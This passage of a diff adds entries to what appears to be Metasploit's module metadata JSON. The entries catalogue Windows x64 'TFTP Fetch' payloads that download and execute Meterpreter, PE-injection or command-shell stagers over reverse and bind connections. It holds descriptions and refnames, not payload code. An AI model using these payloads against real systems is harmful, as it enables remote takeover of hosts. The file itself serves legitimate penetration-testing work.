Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter_reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_ipv6_tcp", + "staged": false + }, + "payload_cmd/windows/tftp/x64/meterpreter_reverse_tcp": { + "name": "TFTP Fetch, Windows Meterpreter Shell, Reverse TCP Inline x64", + "fullname": "payload/cmd/windows/tftp/x64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "OJ Reeves", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/tftp/x64/peinject/bind_ipv6_tcp": { + "name": "TFTP Fetch, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/tftp/x64/peinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/peinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": 
"windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/tftp/x64/peinject/bind_ipv6_tcp_uuid": { + "name": "TFTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/tftp/x64/peinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/peinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/tftp/x64/peinject/bind_named_pipe": { + "name": "TFTP Fetch, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/tftp/x64/peinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": 
"2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/peinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/peinject/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/tftp/x64/peinject/bind_tcp": { + "name": "TFTP Fetch, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/tftp/x64/peinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/peinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/peinject/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/tftp/x64/peinject/bind_tcp_rc4": { + "name": "TFTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/tftp/x64/peinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": 
null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/peinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/peinject/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/tftp/x64/peinject/bind_tcp_uuid": { + "name": "TFTP Fetch, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/tftp/x64/peinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/peinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + 
"session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/peinject/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/tftp/x64/peinject/reverse_named_pipe": { + "name": "TFTP Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/cmd/windows/tftp/x64/peinject/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker via a named pipe pivot", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/peinject/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/peinject/reverse_named_pipe", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_named_pipe" + }, + "payload_cmd/windows/tftp/x64/peinject/reverse_tcp": { + "name": "TFTP Fetch, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/tftp/x64/peinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker (Windows x64)", + 
"references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/peinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/peinject/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/tftp/x64/peinject/reverse_tcp_rc4": { + "name": "TFTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/tftp/x64/peinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "hdm ", + "skape ", + "sf ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/peinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/peinject/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/peinject", 
+ "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/tftp/x64/peinject/reverse_tcp_uuid": { + "name": "TFTP Fetch, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/tftp/x64/peinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ege ", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/EgeBalci/Amber" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/peinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/peinject/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/peinject", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/tftp/x64/pingback_reverse_tcp": { + "name": "TFTP Fetch, Windows x64 Pingback, Reverse TCP Inline", + "fullname": "payload/cmd/windows/tftp/x64/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and report UUID (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + 
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/pingback_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/tftp/x64/powershell_bind_tcp": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/windows/tftp/x64/powershell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/powershell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/powershell_bind_tcp", + "staged": false + }, + "payload_cmd/windows/tftp/x64/powershell_reverse_tcp": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/windows/tftp/x64/powershell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.", + "references": [ + 
"URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/powershell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/powershell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/tftp/x64/powershell_reverse_tcp_ssl": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/windows/tftp/x64/powershell_reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Ben Turner", + "Dave Hardy", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/powershell_reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/powershell_reverse_tcp_ssl", + "staged": false + }, + "payload_cmd/windows/tftp/x64/shell/bind_ipv6_tcp": { + "name": "TFTP Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager", + "fullname": 
"payload/cmd/windows/tftp/x64/shell/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/shell/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/shell/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/tftp/x64/shell/bind_ipv6_tcp_uuid": { + "name": "TFTP Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/tftp/x64/shell/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/shell/bind_ipv6_tcp_uuid", + 
"check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/shell/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/tftp/x64/shell/bind_named_pipe": { + "name": "TFTP Fetch, Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/tftp/x64/shell/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/shell/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/shell/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/tftp/x64/shell/bind_tcp": { + "name": "TFTP Fetch, Windows x64 Command Shell, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/tftp/x64/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an 
x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/shell/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/tftp/x64/shell/bind_tcp_rc4": { + "name": "TFTP Fetch, Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/tftp/x64/shell/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/shell/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": 
"windows/x64/shell/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/tftp/x64/shell/bind_tcp_uuid": { + "name": "TFTP Fetch, Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/tftp/x64/shell/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/shell/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/shell/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/tftp/x64/shell/reverse_tcp": { + "name": "TFTP Fetch, Windows x64 Command Shell, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/tftp/x64/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + 
"autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/shell/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/tftp/x64/shell/reverse_tcp_rc4": { + "name": "TFTP Fetch, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/tftp/x64/shell/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/shell/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/shell/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/tftp/x64/shell/reverse_tcp_uuid": { + 
"name": "TFTP Fetch, Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/tftp/x64/shell/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/shell/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/shell/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/tftp/x64/shell_bind_tcp": { + "name": "TFTP Fetch, Windows x64 Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/windows/tftp/x64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection and spawn a command shell (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": 
